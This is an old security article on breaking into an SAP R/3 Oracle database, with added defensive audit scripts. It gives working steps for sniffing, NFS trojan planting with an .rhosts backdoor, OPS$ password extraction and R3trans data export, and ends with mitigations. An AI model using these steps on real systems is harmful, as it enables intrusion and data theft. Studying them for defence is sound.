We hack an SAP database
Jochen Hein
$Id: ora-hack.xml,v 1.3 03/01/2002 18:29:36 jhein Exp $
--------------------------------------------------------------------------------

First of all, just for fun: how to hack SAP. Kids, don't do that at home. We
only use standard techniques, though, which every admin should have known about
for a long time.
--------------------------------------------------------------------------------
1.1. Hacking with Unix / network tools

We know nothing (except that there is supposed to be an SAP R/3 system, and
chances are good that there is an Oracle database as well) and we have a laptop.
By chance we find a wired network socket (or we splice ourselves in with a mini
hub for fifty). And then we listen to what comes along. SAP R/3 systems can be
reachable on many different ports. In general we find the application server on
a port in the range 3200-3299 and the message server between 3600 and 3699. The
last two digits are usually the so-called system number. These ports can be
changed in the profile, but one can assume that most systems run in this
configuration. Figure 1 shows an example invocation of tcpdump; there are other
tools as well.

Figure 1: Packet sniffer

    #!/bin/sh
    # Show only TCP packets with the SYN or FIN flag set (tcp[13] & 3) whose
    # destination port (tcp[2:2]) is a dispatcher (32xx) or message server
    # (36xx) port.
    tcpdump -n -i eth0 'tcp[13] & 3 != 0 and \
        ((tcp[2:2] >= 3200 and tcp[2:2] < 3300) or \
         (tcp[2:2] >= 3600 and tcp[2:2] < 3700))'

As a result you only get to see the connection setup to an application server
or to the message server. The first expression, tcp[13] & 3 != 0, filters out
exactly those TCP packets. Only IP addresses and port numbers are shown here,
no names. The result (Figure 2, shown here greatly shortened) we remember.

Figure 2: Result of the sniffer

    192.168.1.1.4722 > 192.168.10.1.3200

Now we know one or more SAP servers and can analyze them further. This initial
attack can be countered with a switched network, where each computer sees only
the packets intended for it. There are attacks against switches that degrade
them to hubs, so that afterwards a sniffer can be used again.

Having learned which addresses are active in the network, we choose a suitable
IP address for what follows (hoping that we are not noticed). Helpful for the
system administrator would be a tool such as arpwatch, which at least reports
the new computer. The intruder can of course use the MAC and IP address of a
workstation in the evening; then only a time restriction and the appropriate
monitoring in the network help. With a special Linux system on the laptop you
are practically invisible to the network administrator. What is special about
that Linux is a kernel patch (perhaps at
http://linux.davecentral.com/projects/stealthkernelpatch/) that prevents the
system from ever sending a packet. Otherwise an Intrusion Detection System (IDS)
might notice that a computer with a network card in promiscuous mode is active.

In the next step we pick a free IP address (possibly that of a PC that is
switched off at night) and use it on our laptop. Should it turn out that we need
DNS access, we listen for packets to port 53 and configure the corresponding
server locally. With a little luck we get by without it (if the name server runs
with query logging, we could be recognized). With the program sapgui we connect
to that machine and port, so that we have the system ID in the status bar
(Figure 3). With Oracle this is also equal to the Oracle SID. If we have found a
port 36nr, we try lgtst (included with the Unix SAPGUI) to get more information
about the system. In that case load balancing is presumably in use.

Figure 3: Connecting with SAPGUI

    sapgui /H/victim-IP/S/victim-port
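The following script is an added example and not part of Jochen Hein's article: it reads tcpdump lines in the format of Figure 2 from the administrator's side, maps the destination port to dispatcher / gateway / message server and the system number (the ranges from sections 1.1 and 1.3), and reports clients that are not on an allow list. The sample lines and the allow list are constructed.

```python
import re

# Conventional SAP port ranges from sections 1.1 and 1.3: the last two
# digits of the port are the system number.
SAP_PORT_RANGES = {
    "dispatcher": (3200, 3299),
    "gateway": (3300, 3399),
    "message server": (3600, 3699),
}

# Matches the "src.sport > dst.dport" form of tcpdump -n output (Figure 2).
FLOW_RE = re.compile(r"(\d+\.\d+\.\d+\.\d+)\.(\d+) > (\d+\.\d+\.\d+\.\d+)\.(\d+)")


def classify_port(port):
    """Return (service, system number) for a conventional SAP port, else None."""
    for service, (low, high) in SAP_PORT_RANGES.items():
        if low <= port <= high:
            return service, "%02d" % (port - low)
    return None


def audit_flows(lines, known_clients):
    """Report SAP connections whose client address is not in the allow list."""
    findings = []
    for line in lines:
        match = FLOW_RE.search(line)
        if not match:
            continue
        client, server, dport = match.group(1), match.group(3), int(match.group(4))
        service = classify_port(dport)
        if service is not None and client not in known_clients:
            findings.append({"client": client, "server": server,
                             "service": service[0], "sysnr": service[1]})
    return findings


# Constructed sample lines in the Figure 2 format; not real captures.
SAMPLE_LINES = [
    "192.168.1.1.4722 > 192.168.10.1.3200: S 1:1(0) win 5840",
    "192.168.1.7.1034 > 192.168.10.1.3600: S 1:1(0) win 5840",
    "192.168.1.1.4723 > 192.168.10.1.22: S 1:1(0) win 5840",
    "192.168.1.99.2001 > 192.168.10.1.3300: S 1:1(0) win 5840",
]
KNOWN_CLIENTS = {"192.168.1.1", "192.168.1.7"}  # assumed known SAP front ends

if __name__ == "__main__":
    for finding in audit_flows(SAMPLE_LINES, KNOWN_CLIENTS):
        print(finding)
```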
--------------------------------------------------------------------------------
1.2. A short detour

From here on we are active in the network. If the system administrator has an
Intrusion Detection System, notices port scans, or reads his log files, he might
get suspicious. Don't do this in someone else's network; even in your own you
should first talk to your colleagues. You have been warned.

First we find out what kind of system is there (tools for that are available on
every street corner). Depending on the system it may be worthwhile to attack the
system directly; rootshell is always a good source for that. telnet perhaps
reveals the name of the operating system; nmap -O victim-IP possibly reveals the
operating system as well. This is a Unix system, so I know my way around. A
first, pretty brazen attempt is to log in as root with the rlogin command. Yes,
sometimes that works: game over, thank you for playing.

On Unix systems you can use the command showmount -e to find the directories
exported via NFS. With a little luck, important volumes have been exported to
all computers, possibly even writable. A shocking example is shown in Figure 4.

Figure 4: NFS exploit

    cracker# showmount -e victim-IP
    Export list for victim-IP:
    /sapmnt/SID (everyone)

Aha: here the system SID is exposed. We would also see it with the SAPGUI after
the port scan. Far more useful, however, is that we can mount the NFS volume,
create a user sidadm and replace any program (yes, this is a practical example
that actually exists; I find it almost negligent). The user sidadm owns the data
of R/3; on Unix the Oracle database belongs to the user orasid. Figure 5 shows a
possible approach to replacing Unix programs. With a little luck nobody notices,
and if someone does, it is hard to understand what happened (or do you keep logs
of successful NFS mounts?).

Figure 5: Planting a Trojan horse

    cracker# mount -t nfs victim-IP:/sapmnt/SID /mnt
    cracker# ls -l
    ... in this listing we find the numerical user ID of the Unix user sidadm ...
    cracker# adduser -u number sidadm
    cracker# su - sidadm
    sidadm> cd /mnt/exe
    sidadm> mv brarchive .brarchive
    sidadm> cat > brarchive
    #!/bin/sh
    # create a backdoor
    echo my-ip >> $HOME/.rhosts
    # and start the old program so that nothing stands out
    exec /sapmnt/SID/exe/.brarchive
    Ctrl-C
    sidadm> chmod a+x brarchive

Now we just wait a day (namely until brarchive is run the next time) and we have
won. We can now log in as sidadm with rlogin, without a password. Thank you very
much for this simple game.
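An added example from the administrator's side, not code from the article: a checker that parses the output of showmount -e in the format of Figure 4 and reports exports that any host may mount, rating the R/3 volumes named in this section (/sapmnt, /usr/sap, /oracle) as high severity. The sample export list is constructed.

```python
# Constructed "showmount -e" output in the format of Figure 4; not from a real host.
SAMPLE_EXPORTS = """\
Export list for victim-IP:
/sapmnt/SID     (everyone)
/usr/sap/trans  192.168.10.0/24,192.168.11.5
/home           *.example.test
/oracle/SID     192.168.10.5
"""

# Volumes that hold R/3 executables, transports or the database (section 1.2).
SAP_PREFIXES = ("/sapmnt", "/usr/sap", "/oracle")


def parse_exports(text):
    """Parse showmount -e output into {export path: [client specs]}."""
    exports = {}
    for line in text.splitlines():
        if not line.startswith("/"):
            continue  # skip the "Export list for ..." header
        path, _, spec = line.partition(" ")
        spec = spec.strip().strip("()")  # "(everyone)" -> "everyone"
        exports[path] = [c.strip() for c in spec.split(",") if c.strip()]
    return exports


def audit_exports(text):
    """Return (path, severity, reason) for exports that any host can mount."""
    findings = []
    for path, clients in parse_exports(text).items():
        severity = "high" if path.startswith(SAP_PREFIXES) else "medium"
        for client in clients:
            if client == "everyone":
                findings.append((path, severity, "exported to every host"))
            elif "*" in client:
                findings.append((path, severity, "exported to wildcard " + client))
    return findings


if __name__ == "__main__":
    for path, severity, reason in audit_exports(SAMPLE_EXPORTS):
        print(severity, path, reason)
```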
--------------------------------------------------------------------------------
1.3. Back to SAP

Now we search for the database server. A port scan of the computer found above
perhaps reveals the message server, and perhaps an Oracle port. Figure 6
contains a good example.

Figure 6: Calling a port scanner

    nmap -p 3200-3699 <ip-address>
    nmap -p 1527 <ip-address>

These are the ports of the SAP dispatcher (32xx), any gateway processes (33xx)
and the message server (36xx). Look for an Oracle listener. There are people who
say it runs on port 1521 by default. Hm, guess and check: hosts nearby (change
the last digit of the IP address)! Further SAP systems may turn up on other
servers. Besides, one could possibly exploit trust relationships between
different systems, but that is not our goal today.

Assumption: there is one central instance; database and instance run on one
computer. Whether this assumption holds can be found out with the program
sapinfo. The program is available on the GUI CD in the RFC SDK. Figure 7
contains another example.

Figure 7: The program sapinfo

    cracker# sapinfo ashost=ip-address sysnr=n
    SAP System Information
    -----------------------------------------------
    Destination             hostname_SID_nr
    Host                    hostname
    System ID               SID
    Database                SID
    DB host                 hostname
    DB system               ORACLE

    SAP release             40B
    SAP kernel release      40B

    RFC protocol            011
    Characters              1100
    Integers                BIG
    Floating P.             IE3
    SAP machine id          320

    Time Zone               3600 (Daylight saving time)

With a computer that has only one network card we are now done. If the computer
is multi-homed, then perhaps the output of lgtst helps. Otherwise only targeted
guessing helps, or access to the DNS server of the victim (if available). We now
know:

- the IP address(es) of the victim,
- the system number of the R/3 system (the last two digits of the SAP ports),
- the system ID of the system and of the Oracle database,
- the name of the database server.

Thus armed we proceed to the actual goal: access to the SAP database.
--------------------------------------------------------------------------------
1.4. Hacking the Oracle database

We create a SQL*Net V2 configuration which hopefully gives us access to the
database. We need a sqlnet.ora file (SAP standard, see Figure 8) and a
tnsnames.ora file (Figure 9). With the environment variable TNS_ADMIN we can
specify the path to these files, but on our laptop (the Oracle programs are
installed here as well) we are free to do as we like anyway.

Figure 8: The file sqlnet.ora

    ################
    # Filename......: sqlnet.ora
    # Name..........: template
    # Date..........:
    ################
    AUTOMATIC_IPC = ON
    TRACE_LEVEL_CLIENT = OFF
    SQLNET.EXPIRE_TIME = 0
    NAMES.DEFAULT_DOMAIN = world
    NAME.DEFAULT_ZONE = world
    # SQLNET.AUTHENTICATION_SERVICES = (ALL)

Figure 9: The file tnsnames.ora

    SID.world =
      (DESCRIPTION =
        (ADDRESS_LIST =
          (ADDRESS =
            (COMMUNITY = sap.world)
            (PROTOCOL = TCP)
            (Host = hostname)
            (Port = 1527)
          )
        )
        (CONNECT_DATA =
          (SID = SID)
          (GLOBAL_NAME = SID.world)
        )
      )

If the default passwords have not been changed, we can connect to the database
in svrmgrl with the command connect sapr3/sap@SID. Otherwise we have to use the
OPS$ mechanism of the Oracle database to find out the password of the user SAPR3
(Figure 10). For that we have to create a user sidadm on the laptop.

Figure 10: Hacking Oracle

    sidadm> setenv TNS_ADMIN $HOME/
    sidadm> setenv ORACLE_HOME /oracle/SID
    sidadm> setenv ORACLE_SID SID
    sidadm> svrmgrl

    Oracle Server Manager Release 3.0.6.0.0 - Production
    (c) Copyright 1999 Oracle Corporation.  All Rights Reserved.
    Oracle8 Enterprise Edition Release 8.0.6.1.0 - Production
    PL/SQL Release 8.0.6.1.0 - Production

    SVRMGR> connect /@SID
    Connected.
    SVRMGR> select * from sapuser;
    USERID PASSWD
    ------ ------
    SAPR3  geheim
    1 row selected.
    SVRMGR> connect SAPR3/geheim@SID
    Connected.

We connect to the database as the OPS$ user. In Oracle this user is created as
"identified externally", so we do not have to specify a password here. Since we
do not work directly on the database server, we specify the SID, which is
resolved using the SQL*Net V2 configuration. With the data stored in the table
SAPUSER we can now log on to the database with the password of SAPR3.
--------------------------------------------------------------------------------
1.5. Ideas

In current SAP R/3 versions the password is stored encrypted in the table
SAPUSER. So it is not quite that simple; there are two paths one can follow:

- An attack on the encryption with cryptographic methods. I would like to try
  this sometime, but at least in the medium term I lack the time for it. OSS
  note 150790 makes this idea particularly appealing: the encryption uses the
  general SAP encryption routine. That suggests one could also crack the
  passwords of R/3 users with it.

- Install R3trans on the laptop. With the attack used above one could use tools
  such as R3trans and thus gain access to the database. Since the encryption is
  implemented in R3trans, one should be able to access all R/3 data without the
  analysis above. A quick test shows me the following:

Figure 11: R3trans for database access

    sidadm> export PATH="$PATH:oracle/SID/817_32/bin/:/usr/sap/SID/SYS/exe/run"
    sidadm> export dbms_type=ora
    sidadm> export DIR_LIBRARY=/usr/sap/SID/SYS/exe/run
    sidadm> export dbs_ora_tnsname=SID
    sidadm> export TNS_ADMIN=/home/sidadm
    sidadm> cat control
    export
    compress=no
    client=000
    # select table where name = T000
    select * from T000
    sidadm> R3trans control
    ...
    sidadm> strings trans.dat
    ...
    q 000SAP AG Walldorf DEM [...]
    q 001Auslieferungsmandant R11 Kundstadt EUR [...]
    ...

Here one need only imagine what an attacker could do: export tables (and remove
a client ;-)) and analyze them after importing them into a WAS / IDES, or
generate a transport file in a WAS, e.g. with a user with sufficient permissions
or a lot of suitable documents. If R3trans can connect to the database, you can
also sniff the password with tcpdump or dsniff
(http://www.monkey.org/~dugsong/dsniff/, probably dsniff -s 4096 [1]). Then the
command svrmgrl can be used as usual. Congratulations!
--------------------------------------------------------------------------------
1.6. Considerations on SAP password encryption

What SAP calls encryption is in fact only an obfuscation. If the encryption is
regarded as a function f of the password, then the encrypted password is the
result of the function, f(password). Since programs such as R3trans are able to
transform the encrypted password back into plaintext without any further
settings, there exists a function f^-1 for which f^-1(f(password)) = password.
This obfuscation is (as shown above) very easy to outwit, because I can have
R3trans decrypt any obfuscated password. Thus the cryptographic analysis of the
"encryption" is only of sporting interest; the pragmatic approach is simple: use
the program R3trans to decrypt the password in question.
--------------------------------------------------------------------------------
1.7. Conclusion

Thank you very much for the flowers. The only workaround that comes to my mind
is to put a packet filter in front of the Oracle ports and to use a switched
network. Besides, you should think about a firewall between the SAP servers and
the rest of the network. Really. Then the NFS hack might have failed, too.

A more intensive search through several documents eventually led to the file
protocol.ora. In this file you can switch on an IP-based check with the entry
validnode_checking. The entry invited_nodes then contains the allowed IP
addresses or host names. Figure 12 shows a fitting example. Due to an Oracle bug
you should never use host names: if a host name cannot be resolved, the access
restriction is lifted without any message and everyone can read all the data
again!

Figure 12: The file protocol.ora

    tcp.nodelay = true
    tcp.validnode_checking = yes
    tcp.invited_nodes = (IP address, IP address)

A disadvantage of this configuration is that a new application server, or a
system from the transport network (for test imports), has to be entered here.
So you buy the higher security with more effort and possibly a laborious
troubleshooting session if you have forgotten this setting. The really big
problem, in my view, is that SAP is installed insecurely in the default
installation, that the manuals contain no information about this problem, and
that the fix is well hidden in the OSS. Systems with information as worth
protecting as that in SAP R/3 in particular should not show such gaps in the
default installation. The problem has been known since 1999, but so far I have
not seen any changes in the installations.
--------------------------------------------------------------------------------
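As an added example (not code from the article) covering the exposure of section 1.4 and the fix of section 1.7: a small checker that parses a protocol.ora, confirms that tcp.validnode_checking is switched on, and flags tcp.invited_nodes entries that are host names rather than IP addresses, because of the unresolved-name behaviour described above. It assumes only the three entries of Figure 12; the weak file and its corrected form are constructed.

```python
import re

IPV4_RE = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")


def parse_protocol_ora(text):
    """Parse the 'key = value' lines of protocol.ora into a dict (keys lower-cased)."""
    params = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()  # drop comments
        if "=" in line:
            key, value = line.split("=", 1)
            params[key.strip().lower()] = value.strip()
    return params


def parse_node_list(value):
    """Split '(a, b, c)' into ['a', 'b', 'c']."""
    return [node.strip() for node in value.strip("()").split(",") if node.strip()]


def audit_protocol_ora(text):
    """Return the problems section 1.7 warns about, as a list of strings."""
    params = parse_protocol_ora(text)
    if params.get("tcp.validnode_checking", "").lower() != "yes":
        return ["tcp.validnode_checking is not 'yes': every client may connect to the listener"]
    nodes = parse_node_list(params.get("tcp.invited_nodes", ""))
    findings = []
    if not nodes:
        findings.append("tcp.invited_nodes is empty")
    for node in nodes:
        if not IPV4_RE.match(node):
            findings.append("invited node '%s' is a host name: if it does not resolve, "
                            "the restriction is silently dropped; use an IP address" % node)
    return findings


# Constructed examples (not from a real system): first a file with a host name
# in the list, then the corrected file with IP addresses only.
WEAK_PROTOCOL_ORA = """\
tcp.nodelay = true
tcp.validnode_checking = yes
tcp.invited_nodes = (192.168.10.5, appserver2.example.test)
"""
FIXED_PROTOCOL_ORA = """\
tcp.nodelay = true
tcp.validnode_checking = yes
tcp.invited_nodes = (192.168.10.5, 192.168.10.6)
"""

if __name__ == "__main__":
    for name, text in (("weak", WEAK_PROTOCOL_ORA), ("fixed", FIXED_PROTOCOL_ORA)):
        print(name, audit_protocol_ora(text) or ["ok"])
```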
1.8. OSS notes and R/3 versions

Note 186119: from 4.5B on the table SAPUSER is encrypted. Note 186119 is valid
in 4.0x, 4.5x, 4.6x. According to the guide there is no change from 6.10 on.
For WAS/6.10 the database user is SAP<SID>.

Note 361641: creating the OPS$ user on UNIX. R/3 >= 6.10: use the script
oradbusr.sql (see also note 50088).

[1] Why doesn't dsniff capture Oracle logins? Increase the default snaplen with
dsniff -s 4096. Oracle logins can be quite chatty...